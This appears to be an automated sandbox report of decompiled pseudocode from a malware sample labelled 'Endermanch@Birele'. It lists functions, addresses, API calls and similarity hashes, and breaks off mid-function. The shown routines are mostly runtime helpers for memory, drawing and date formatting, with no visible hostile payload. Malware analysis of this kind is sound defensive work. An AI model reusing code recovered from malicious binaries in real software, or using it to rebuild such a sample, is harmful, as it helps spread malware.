                                                                                                          				_t9 = __ecx;
                                                                                                          				_t14 = __edx;
                                                                                                          				_t17 = __eax;
                                                                                                          				 *(__ecx + 4) = 0x100000;
                                                                                                          				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                                                                                          				_t13 = _t4;
                                                                                                          				 *_t9 = _t13;
                                                                                                          				if(_t13 == 0) {
                                                                                                          					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                                                                          					_t9[1] = _t16;
                                                                                                          					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                                                                                          					 *_t9 = _t4;
                                                                                                          				}
                                                                                                          				if( *_t9 != 0) {
                                                                                                          					_t4 = E00401344(0x4195e4, _t9);
                                                                                                          					if(_t4 == 0) {
                                                                                                          						VirtualFree( *_t9, 0, 0x8000);
                                                                                                          						 *_t9 = 0;
                                                                                                          						return 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t4;
                                                                                                          			}









                                                                                                          0x004014f8
                                                                                                          0x004014fa
                                                                                                          0x004014fc
                                                                                                          0x004014fe
                                                                                                          0x00401512
                                                                                                          0x00401517
                                                                                                          0x00401519
                                                                                                          0x0040151d
                                                                                                          0x00401525
                                                                                                          0x0040152b
                                                                                                          0x00401537
                                                                                                          0x0040153c
                                                                                                          0x0040153c
                                                                                                          0x00401541
                                                                                                          0x0040154a
                                                                                                          0x00401551
                                                                                                          0x0040155d
                                                                                                          0x00401564
                                                                                                          0x00000000
                                                                                                          0x00401564
                                                                                                          0x00401551
                                                                                                          0x0040156a

                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,L*a,?,?,?,00401860), ref: 00401512
                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,L*a,?,?,?,00401860), ref: 00401537
                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,L*a,?,?,?,00401860), ref: 0040155D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                          • String ID: L*a$\*a
                                                                                                          • API String ID: 3668210933-59427461
                                                                                                          • Opcode ID: f7b7489a7cc1fd0c604ba33b60ec27437cec5aa7ba496154ad775c33312cdc73
                                                                                                          • Instruction ID: bba0cb97c3748fbfed120046b3edae0576dc62b48dd58dc576eb6a0b7144cf39
                                                                                                          • Opcode Fuzzy Hash: f7b7489a7cc1fd0c604ba33b60ec27437cec5aa7ba496154ad775c33312cdc73
                                                                                                          • Instruction Fuzzy Hash: FCF0FCB17403107BEB319E694C85F437AD8DF85B94F1040BABA08FF3DAD679580086AC
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 84%
                                                                                                          			E00407047(void* __eax, char* __ecx, void* __edx) {
                                                                                                          				void* _t8;
                                                                                                          				void* _t22;
                                                                                                          				struct HDC__* _t28;
                                                                                                          				void* _t30;
                                                                                                          				RECT* _t31;
                                                                                                          
                                                                                                          				_t8 = __eax + 0x14;
                                                                                                          				if(_t8 == 0) {
                                                                                                          					 *__ecx = 1;
                                                                                                          					_t22 = _t8;
                                                                                                          					_t28 =  *(__edx + 8);
                                                                                                          					E00406250(_t8);
                                                                                                          					_t34 =  *(_t22 + 0x35) & 0x00000001;
                                                                                                          					if(( *(_t22 + 0x35) & 0x00000001) == 0) {
                                                                                                          						SetBkMode(_t28, 2);
                                                                                                          						SetBkColor(_t28, E00406A10( *((intOrPtr*)(_t22 + 0xa4)), _t34));
                                                                                                          						SetBrushOrgEx(_t28, 0, 0, 0);
                                                                                                          						_t31 = _t30 - 0x10;
                                                                                                          						GetClientRect( *(_t22 + 0x1c), _t31);
                                                                                                          						FillRect(_t28, _t31,  *0x418100());
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return 0;
                                                                                                          			}








                                                                                                          0x00407047
                                                                                                          0x00407049
                                                                                                          0x0040704b
                                                                                                          0x00407050
                                                                                                          0x00407052
                                                                                                          0x00407055
                                                                                                          0x0040705a
                                                                                                          0x0040705e
                                                                                                          0x00407063
                                                                                                          0x00407075
                                                                                                          0x00407080
                                                                                                          0x00407085
                                                                                                          0x0040708c
                                                                                                          0x0040709e
                                                                                                          0x004070a3
                                                                                                          0x004070a7
                                                                                                          0x004070aa

                                                                                                          APIs
                                                                                                          • SetBkMode.GDI32(?,00000002), ref: 00407063
                                                                                                            • Part of subcall function 00406A10: GetSysColor.USER32(?), ref: 00406A1A
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00407075
                                                                                                          • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,00000000,?,00000002), ref: 00407080
                                                                                                          • GetClientRect.USER32(?), ref: 0040708C
                                                                                                          • FillRect.USER32(?,?,00000000), ref: 0040709E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorRect$BrushClientFillMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 3196769796-0
                                                                                                          • Opcode ID: 9a69fc12e34aec42f221edcf021c1be237b5f42837a37956d92126f98574e677
                                                                                                          • Instruction ID: 6db12d2b8c05585b70774b31dec96cf96e1eea607f94370a1883cc97d34a33cd
                                                                                                          • Opcode Fuzzy Hash: 9a69fc12e34aec42f221edcf021c1be237b5f42837a37956d92126f98574e677
                                                                                                          • Instruction Fuzzy Hash: 06F03062A011003AE7117A359C82E3B76ACDF92718F44847EFC00B91D3DA7E9C624A7A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E0040C854(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				char _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				void* _t41;
                                                                                                          				signed int _t45;
                                                                                                          				signed int _t47;
                                                                                                          				signed int _t49;
                                                                                                          				signed int _t51;
                                                                                                          				intOrPtr _t75;
                                                                                                          				void* _t76;
                                                                                                          				signed int _t77;
                                                                                                          				signed int _t83;
                                                                                                          				signed int _t92;
                                                                                                          				intOrPtr _t111;
                                                                                                          				void* _t122;
                                                                                                          				void* _t124;
                                                                                                          				intOrPtr _t127;
                                                                                                          				void* _t128;
                                                                                                          
                                                                                                          				_t128 = __eflags;
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_t122 = __edx;
                                                                                                          				_t124 = __eax;
                                                                                                          				_push(_t127);
                                                                                                          				_push(0x40ca1e);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t127;
                                                                                                          				_t92 = 1;
                                                                                                          				E004039AC(__edx);
                                                                                                          				E0040C51C(GetThreadLocale(), 0x40ca34, 0x1009,  &_v12);
                                                                                                          				if(E00409A90(0x40ca34, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                          					while(1) {
                                                                                                          						_t41 = E00403C48(_t124);
                                                                                                          						__eflags = _t92 - _t41;
                                                                                                          						if(_t92 > _t41) {
                                                                                                          							goto L28;
                                                                                                          						}
                                                                                                          						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                                          						asm("bt [0x418250], eax");
                                                                                                          						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                                          							_t45 = E00409F2C(_t124 + _t92 - 1, 2, 0x40ca38);
                                                                                                          							__eflags = _t45;
                                                                                                          							if(_t45 != 0) {
                                                                                                          								_t47 = E00409F2C(_t124 + _t92 - 1, 4, 0x40ca48);
                                                                                                          								__eflags = _t47;
                                                                                                          								if(_t47 != 0) {
                                                                                                          									_t49 = E00409F2C(_t124 + _t92 - 1, 2, 0x40ca60);
                                                                                                          									__eflags = _t49;
                                                                                                          									if(_t49 != 0) {
                                                                                                          										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                                          										__eflags = _t51;
                                                                                                          										if(_t51 == 0) {
                                                                                                          											L24:
                                                                                                          											E00403C50(_t122, 0x40ca78);
                                                                                                          										} else {
                                                                                                          											__eflags = _t51 != 0x20;
                                                                                                          											if(_t51 != 0x20) {
                                                                                                          												E00403B94();
                                                                                                          												E00403C50(_t122, _v24);
                                                                                                          											} else {
                                                                                                          												goto L24;
                                                                                                          											}
                                                                                                          										}
                                                                                                          									} else {
                                                                                                          										E00403C50(_t122, 0x40ca6c);
                                                                                                          										_t92 = _t92 + 1;
                                                                                                          									}
                                                                                                          								} else {
                                                                                                          									E00403C50(_t122, 0x40ca58);
                                                                                                          									_t92 = _t92 + 3;
                                                                                                          								}
                                                                                                          							} else {
                                                                                                          								E00403C50(_t122, 0x40ca44);
                                                                                                          								_t92 = _t92 + 1;
                                                                                                          							}
                                                                                                          							_t92 = _t92 + 1;
                                                                                                          							__eflags = _t92;
                                                                                                          						} else {
                                                                                                          							_v8 = E0040D7B8(_t124, _t92);
                                                                                                          							E00403E98(_t124, _v8, _t92,  &_v20);
                                                                                                          							E00403C50(_t122, _v20);
                                                                                                          							_t92 = _t92 + _v8;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					_t75 =  *0x4199cc; // 0x9
                                                                                                          					_t76 = _t75 - 4;
                                                                                                          					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                          						_t77 = 1;
                                                                                                          					} else {
                                                                                                          						_t77 = 0;
                                                                                                          					}
                                                                                                          					if(_t77 == 0) {
                                                                                                          						E00403A00(_t122, _t124);
                                                                                                          					} else {
                                                                                                          						while(_t92 <= E00403C48(_t124)) {
                                                                                                          							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                                          							__eflags = _t83;
                                                                                                          							if(_t83 != 0) {
                                                                                                          								__eflags = _t83 != 0x20;
                                                                                                          								if(_t83 != 0x20) {
                                                                                                          									E00403B94();
                                                                                                          									E00403C50(_t122, _v16);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							_t92 = _t92 + 1;
                                                                                                          							__eflags = _t92;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				L28:
                                                                                                          				_pop(_t111);
                                                                                                          				 *[fs:eax] = _t111;
                                                                                                          				_push(E0040CA25);
                                                                                                          				return E004039D0( &_v24, 4);
                                                                                                          			}























                                                                                                          0x0040c854
                                                                                                          0x0040c859
                                                                                                          0x0040c85a
                                                                                                          0x0040c85b
                                                                                                          0x0040c85c
                                                                                                          0x0040c85d
                                                                                                          0x0040c861
                                                                                                          0x0040c863
                                                                                                          0x0040c867
                                                                                                          0x0040c868
                                                                                                          0x0040c86d
                                                                                                          0x0040c870
                                                                                                          0x0040c873
                                                                                                          0x0040c87a
                                                                                                          0x0040c892
                                                                                                          0x0040c8aa
                                                                                                          0x0040c9f4
                                                                                                          0x0040c9f6
                                                                                                          0x0040c9fb
                                                                                                          0x0040c9fd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040c913
                                                                                                          0x0040c918
                                                                                                          0x0040c91f
                                                                                                          0x0040c95d
                                                                                                          0x0040c962
                                                                                                          0x0040c964
                                                                                                          0x0040c983
                                                                                                          0x0040c988
                                                                                                          0x0040c98a
                                                                                                          0x0040c9ab
                                                                                                          0x0040c9b0
                                                                                                          0x0040c9b2
                                                                                                          0x0040c9c7
                                                                                                          0x0040c9c7
                                                                                                          0x0040c9c9
                                                                                                          0x0040c9cf
                                                                                                          0x0040c9d6
                                                                                                          0x0040c9cb
                                                                                                          0x0040c9cb
                                                                                                          0x0040c9cd
                                                                                                          0x0040c9e4
                                                                                                          0x0040c9ee
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040c9cd
                                                                                                          0x0040c9b4
                                                                                                          0x0040c9bb
                                                                                                          0x0040c9c0
                                                                                                          0x0040c9c0
                                                                                                          0x0040c98c
                                                                                                          0x0040c993
                                                                                                          0x0040c998
                                                                                                          0x0040c998
                                                                                                          0x0040c966
                                                                                                          0x0040c96d
                                                                                                          0x0040c972
                                                                                                          0x0040c972
                                                                                                          0x0040c9f3
                                                                                                          0x0040c9f3
                                                                                                          0x0040c921
                                                                                                          0x0040c92a
                                                                                                          0x0040c938
                                                                                                          0x0040c942
                                                                                                          0x0040c947
                                                                                                          0x0040c947
                                                                                                          0x0040c91f
                                                                                                          0x0040c8b0
                                                                                                          0x0040c8b0
                                                                                                          0x0040c8b5
                                                                                                          0x0040c8b8
                                                                                                          0x0040c8c6
                                                                                                          0x0040c8c2
                                                                                                          0x0040c8c2
                                                                                                          0x0040c8c2
                                                                                                          0x0040c8ca
                                                                                                          0x0040c905
                                                                                                          0x0040c8cc
                                                                                                          0x0040c8f1
                                                                                                          0x0040c8d2
                                                                                                          0x0040c8d2
                                                                                                          0x0040c8d4
                                                                                                          0x0040c8d6
                                                                                                          0x0040c8d8
                                                                                                          0x0040c8e1
                                                                                                          0x0040c8eb
                                                                                                          0x0040c8eb
                                                                                                          0x0040c8d8
                                                                                                          0x0040c8f0
                                                                                                          0x0040c8f0
                                                                                                          0x0040c8f0
                                                                                                          0x0040c8fc
                                                                                                          0x0040c8ca
                                                                                                          0x0040ca03
                                                                                                          0x0040ca05
                                                                                                          0x0040ca08
                                                                                                          0x0040ca0b
                                                                                                          0x0040ca1d

                                                                                                          APIs
                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040CA1E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C883
                                                                                                            • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$InfoThread
                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                          • Opcode ID: c5c4d1ad468f46ae4d161a4a3ed99cb74a677070df2ba8e20620db9f792e10f1
                                                                                                          • Instruction ID: 85e01c6e67d729ce3c5020d352bcdb47365480f36c8352ba9020f30c33f2b255
                                                                                                          • Opcode Fuzzy Hash: c5c4d1ad468f46ae4d161a4a3ed99cb74a677070df2ba8e20620db9f792e10f1
                                                                                                          • Instruction Fuzzy Hash: 2C410572708149CBD701EB6988C13BEB79AEB45308B60473BA481F33C6D63C9E03961D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040E01C() {
                                                                                                          				_Unknown_base(*)()* _t1;
                                                                                                          				struct HINSTANCE__* _t3;
                                                                                                          
                                                                                                          				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                          				_t3 = _t1;
                                                                                                          				if(_t3 != 0) {
                                                                                                          					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                          					 *0x418274 = _t1;
                                                                                                          				}
                                                                                                          				if( *0x418274 == 0) {
                                                                                                          					 *0x418274 = E00409E5C;
                                                                                                          					return E00409E5C;
                                                                                                          				}
                                                                                                          				return _t1;
                                                                                                          			}





                                                                                                          0x0040e022
                                                                                                          0x0040e027
                                                                                                          0x0040e02b
                                                                                                          0x0040e033
                                                                                                          0x0040e038
                                                                                                          0x0040e038
                                                                                                          0x0040e044
                                                                                                          0x0040e04b
                                                                                                          0x00000000
                                                                                                          0x0040e04b
                                                                                                          0x0040e051

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E945,00000000,0040E958), ref: 0040E022
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E033
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                          • Opcode ID: 9362f7df9ff455d83417263436656e1e02680dce908f7494a7909927b6157796
                                                                                                          • Instruction ID: 8097af22c7a509eb2429e14b9a2a0615beb49dadf3fe05f52f9a2fe1579c3aba
                                                                                                          • Opcode Fuzzy Hash: 9362f7df9ff455d83417263436656e1e02680dce908f7494a7909927b6157796
                                                                                                          • Instruction Fuzzy Hash: AAD05E71201B168ADB516BB3A8C5B4731889320B44F10487FA110762D1CAFC4C105A4D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 80%
                                                                                                          			E0040B8CD(void* __ecx, void* __edx) {
                                                                                                          				signed short _t159;
                                                                                                          				signed short _t161;
                                                                                                          				signed short _t163;
                                                                                                          				signed short _t165;
                                                                                                          				signed int _t174;
                                                                                                          				void* _t176;
                                                                                                          				intOrPtr _t217;
                                                                                                          				intOrPtr _t220;
                                                                                                          				signed int _t225;
                                                                                                          				void* _t243;
                                                                                                          				void* _t245;
                                                                                                          				intOrPtr _t265;
                                                                                                          				signed short _t273;
                                                                                                          				void* _t274;
                                                                                                          
                                                                                                          				L0:
                                                                                                          				while(1) {
                                                                                                          					L0:
                                                                                                          					E0040B144(_t274);
                                                                                                          					_t273 =  *((intOrPtr*)(_t274 - 4)) - 1;
                                                                                                          					if(E00409F2C(_t273, 5, 0x40bb84) != 0) {
                                                                                                          						_t159 = E00409F2C(_t273, 3, 0x40bb8c);
                                                                                                          						__eflags = _t159;
                                                                                                          						if(_t159 != 0) {
                                                                                                          							_t161 = E00409F2C(_t273, 4, 0x40bb90);
                                                                                                          							__eflags = _t161;
                                                                                                          							if(_t161 != 0) {
                                                                                                          								_t163 = E00409F2C(_t273, 4, 0x40bb98);
                                                                                                          								__eflags = _t163;
                                                                                                          								if(_t163 != 0) {
                                                                                                          									_t165 = E00409F2C(_t273, 3, 0x40bba0);
                                                                                                          									__eflags = _t165;
                                                                                                          									if(_t165 != 0) {
                                                                                                          										E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          									} else {
                                                                                                          										E0040B10C(_t274);
                                                                                                          										_pop(_t243);
                                                                                                          										E0040B074( *((intOrPtr*)(0x41998c + (E0040AFF4(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t243,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          										 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 2;
                                                                                                          									}
                                                                                                          								} else {
                                                                                                          									E0040B10C(_t274);
                                                                                                          									_pop(_t245);
                                                                                                          									E0040B074( *((intOrPtr*)(0x4199a8 + (E0040AFF4(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t245,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          									 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 3;
                                                                                                          								}
                                                                                                          							} else {
                                                                                                          								__eflags =  *((short*)(_t274 - 0x16)) - 0xc;
                                                                                                          								if( *((short*)(_t274 - 0x16)) >= 0xc) {
                                                                                                          									_t217 =  *0x419924; // 0x20a07ec
                                                                                                          									E0040B074(_t217, 4,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          								} else {
                                                                                                          									_t220 =  *0x419920; // 0x20a07dc
                                                                                                          									E0040B074(_t220, 4,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          								}
                                                                                                          								 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 3;
                                                                                                          								 *((char*)(_t274 - 0x1e)) = 1;
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							__eflags =  *((short*)(_t274 - 0x16)) - 0xc;
                                                                                                          							if( *((short*)(_t274 - 0x16)) >= 0xc) {
                                                                                                          								__eflags = _t273;
                                                                                                          							}
                                                                                                          							E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          							 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 2;
                                                                                                          							 *((char*)(_t274 - 0x1e)) = 1;
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
                                                                                                          						if( *((short*)(__ebp - 0x16)) >= 0xc) {
                                                                                                          							__esi = __esi + 3;
                                                                                                          							__eflags = __esi;
                                                                                                          						}
                                                                                                          						__eax =  *(__ebp + 8);
                                                                                                          						__edx = 2;
                                                                                                          						__eax = __esi;
                                                                                                          						__eax = E0040B030(2,  *(__ebp + 8));
                                                                                                          						 *(__ebp - 4) =  *(__ebp - 4) + 4;
                                                                                                          						 *((char*)(__ebp - 0x1e)) = 1;
                                                                                                          					}
                                                                                                          					while(1) {
                                                                                                          						L108:
                                                                                                          						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t274 - 4))));
                                                                                                          						if(_t157 == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						L1:
                                                                                                          						 *(_t274 - 5) = _t157;
                                                                                                          						asm("bt [0x418250], eax");
                                                                                                          						if(( *(_t274 - 5) & 0x000000ff) >= 0) {
                                                                                                          							 *((intOrPtr*)(_t274 - 4)) = E0040D7B0( *((intOrPtr*)(_t274 - 4)));
                                                                                                          							_t174 =  *(_t274 - 5);
                                                                                                          							__eflags = _t174 + 0x9f - 0x1a;
                                                                                                          							if(_t174 + 0x9f - 0x1a < 0) {
                                                                                                          								_t174 = _t174 - 0x20;
                                                                                                          								__eflags = _t174;
                                                                                                          							}
                                                                                                          							__eflags = _t174 + 0xbf - 0x1a;
                                                                                                          							if(_t174 + 0xbf - 0x1a < 0) {
                                                                                                          								__eflags = _t174 - 0x4d;
                                                                                                          								if(_t174 == 0x4d) {
                                                                                                          									__eflags = _t225 - 0x48;
                                                                                                          									if(_t225 == 0x48) {
                                                                                                          										_t174 = 0x4e;
                                                                                                          									}
                                                                                                          								}
                                                                                                          								_t225 = _t174;
                                                                                                          							}
                                                                                                          							L10:
                                                                                                          							_t176 = (_t174 & 0x000000ff) + 0xffffffde;
                                                                                                          							__eflags = _t176 - 0x38;
                                                                                                          							if(_t176 > 0x38) {
                                                                                                          								L107:
                                                                                                          								E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							L11:
                                                                                                          							switch( *((intOrPtr*)( *(_t176 + 0x40b4d7) * 4 +  &M0040B510))) {
                                                                                                          								case 0:
                                                                                                          									goto L107;
                                                                                                          								case 1:
                                                                                                          									L12:
                                                                                                          									E0040B0E0(_t274);
                                                                                                          									E0040B10C(_t274);
                                                                                                          									__eflags =  *((intOrPtr*)(_t274 - 0xc)) - 2;
                                                                                                          									if( *((intOrPtr*)(_t274 - 0xc)) > 2) {
                                                                                                          										E0040B094( *(_t274 - 0xe) & 0x0000ffff, 4, _t280,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          									} else {
                                                                                                          										E0040B094(( *(_t274 - 0xe) & 0x0000ffff) % 0x64, 2, _t280,  *((intOrPtr*)(_t274 + 8)));
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 2:
                                                                                                          									L15:
                                                                                                          									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__edx = __ebp - 0x24;
                                                                                                          									 *(__ebp - 0xc) = E0040B184( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
                                                                                                          									__eax =  *(__ebp - 0x24);
                                                                                                          									__eax = E0040B074( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 3:
                                                                                                          									L16:
                                                                                                          									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__edx = __ebp - 0x28;
                                                                                                          									 *(__ebp - 0xc) = E0040B2EC( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
                                                                                                          									__eax =  *(__ebp - 0x28);
                                                                                                          									__eax = E0040B074( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 4:
                                                                                                          									L17:
                                                                                                          									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
                                                                                                          									__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                          									__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                          									if(__eflags < 0) {
                                                                                                          										__eax =  *(__ebp + 8);
                                                                                                          										__eax =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                          										__edx =  *(__ebp - 0xc);
                                                                                                          										__eax = E0040B094( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									} else {
                                                                                                          										if(__eflags == 0) {
                                                                                                          											 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                          											__eax = 0x41992c[ *(__ebp - 0x10) & 0x0000ffff];
                                                                                                          											__eax = E0040B074(0x41992c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
                                                                                                          										} else {
                                                                                                          											 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                          											__eax =  *(0x41995c + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
                                                                                                          											__eax = E0040B074( *(0x41995c + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                          										}
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 5:
                                                                                                          									L23:
                                                                                                          									E0040B0E0(__ebp) =  *(__ebp - 0xc);
                                                                                                          									__eax =  *(__ebp - 0xc) - 1;
                                                                                                          									__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eflags < 0) {
                                                                                                          										E0040B10C(__ebp) =  *(__ebp + 8);
                                                                                                          										__eax =  *(__ebp - 0x12) & 0x0000ffff;
                                                                                                          										__edx =  *(__ebp - 0xc);
                                                                                                          										__eax = E0040B094( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									} else {
                                                                                                          										if(__eflags == 0) {
                                                                                                          											E0040AFF4(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                                                                                                          											__eax =  *(0x41998c + (__ax & 0x0000ffff) * 4);
                                                                                                          											__eax = E0040B074( *(0x41998c + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                          										} else {
                                                                                                          											__eax = __eax - 1;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eflags == 0) {
                                                                                                          												E0040AFF4(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                                                                                                          												__eax =  *(0x4199a8 + (__ax & 0x0000ffff) * 4);
                                                                                                          												__eax = E0040B074( *(0x4199a8 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                          											} else {
                                                                                                          												__eax = __eax - 1;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													__eax =  *(__ebp + 8);
                                                                                                          													__eax =  *0x419914; // 0x20a07a4
                                                                                                          													__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
